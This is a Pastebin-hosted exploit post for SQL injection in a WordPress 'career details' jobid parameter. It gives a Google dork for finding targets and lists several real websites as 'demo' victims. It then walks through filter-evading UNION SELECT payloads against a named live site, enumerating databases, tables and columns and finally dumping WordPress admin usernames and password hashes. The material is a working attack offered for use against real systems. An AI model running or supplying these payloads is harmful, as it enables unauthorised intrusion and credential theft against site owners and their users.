SHARE
TWEET

Wordpress All Version career details Sql Injection

Netikerty Dec 23rd, 2013 850 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Wordpress All Version career details Sql Injection Vulnerability
  2.  
  3. #######################################################
  4. #
  5. # [+] Exploit Title: Wordpress All Version career details Sql Injection Vulnerability
  6. # [+] Google Dork: inurl:/career-details/?jobid=
  7. # [+] Date: 10/10/2013
  8. # [+] Exploit Author: Iranian_Dark_Coders_Team
  9. # [+] Discovered By: Black.Hack3r
  10. # [+] Version: All Version
  11. # [+] Security Risk: High
  12. # [+] Platforms: php
  13. # [+] Tested on: Windows 7
  14. #
  15. #######################################################
  16. #
  17. # [+] VULNERABILITY:
  18. #
  19. #Wordpress All Version career details Sql Injection Vulnerability
  20. #
  21. #######################################################
  22. #
  23. # [+] Exploit:
  24. #
  25. #http://localhost/[path]/career-details/?jobid=3'[Sql Injection]
  26. #
  27. #######################################################
  28. #
  29. # [+] Proof:
  30. #
  31. #http://localhost/[path]/career-details/?jobid=3+order+by+4-- No Error
  32. #http://localhost/[path]/career-details/?jobid=3+order+by+5-- Error
  33. #
  34. #######################################################
  35. #
  36. # [+] Demo site:
  37. #
  38. #http://www.sheensol.com/career-details?jobid=1
  39. #http://www.stuxbot.co.uk/career-details/?jobid=3
  40. #http://www.op3global.com/career-details/?jobid=3
  41. #http://p2pdevs.com/career-details/?jobid=2
  42. #http://37.58.83.234/~geerling/en/career-details/?jobid=1
  43. #
  44. #######################################################
  45. #
  46. # [+] Discovered By : Black.Hack3r
  47. # [+] We Are : M.R.S.CO,Black.Hack3r,N3O
  48. # [+] SpTnx : Mr.Cicili,Sec4ever,D$@d_M@n,HOt0N,KurD_HaCK3R,MR.0x41,M4H4N,Security,@3is And All Members In wWw.IDC-TeaM.NeT
  49. # [+] Home : http://wWw.IDC-TeaM.NeT
  50. #
  51. #######################################################
  52.  
  53.  
  54. http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,2,3,4--
  55. all databases :------------------------------------------------------------------------------------------------------------------------------------
  56. http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(SCHEMA_NAME)*/)),3,4 /*!12345from*/ /*!12345INFORMATION_SCHEMa.SCHEMATA*/--
  57. ------------------------------------------------------------------------------------------------------------------------------------
  58.  
  59. currentdatabase
  60. :--------------------------------------------------------------------------------------------------
  61. http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,database(),3,4 /*!12345from*/ wp_users--
  62. ------------------------------------------------------------------------------------------------------------------------------------
  63.  
  64.  
  65. tables for current database
  66. :------------------------------------------------------------------------------------------
  67. http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(table_name)*/)),3,4 /*!12345from*/ /*!12345information_schema.tables*/ /*!12345where*/ /*!12345table_schema*/ =database()--
  68. ---------------------------------------------------------------------------------------------------
  69.  
  70.  
  71. columns in table wp_users
  72. : ---------------------------------------------------------------------------------
  73. http://www.bolttechmannings.com/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(COLUMN_NAME)*/)),3,4 /*!12345from*/ /*!12345information_schema.columns*/ /*!12345where*/ /*!12345table_name*/ =CHAR(119, 112, 95, 117, 115, 101, 114, 115)--
  74. -----------------------------------------------------------------------------------------------------------
  75.  
  76.  
  77. admin user & pass
  78. : --------------------------------------------------------------------------------------------
  79. http://www.bolttechmannings.com/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(ID,0x3a,user_login,0x3a,user_pass)*/)),3,4 /*!12345from*/ wp_users--
  80. -------------------------------------------------
  81.  
  82. Note: The exploit-- http://www.mondounix.com/wordpress-easy-career-openings-sql-injection/
  83.  
  84.  
  85. we converted to decimal numbers
  86.  
  87. for this you can use this site:
  88.  
  89. http://www.branah.com/ascii-converter
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top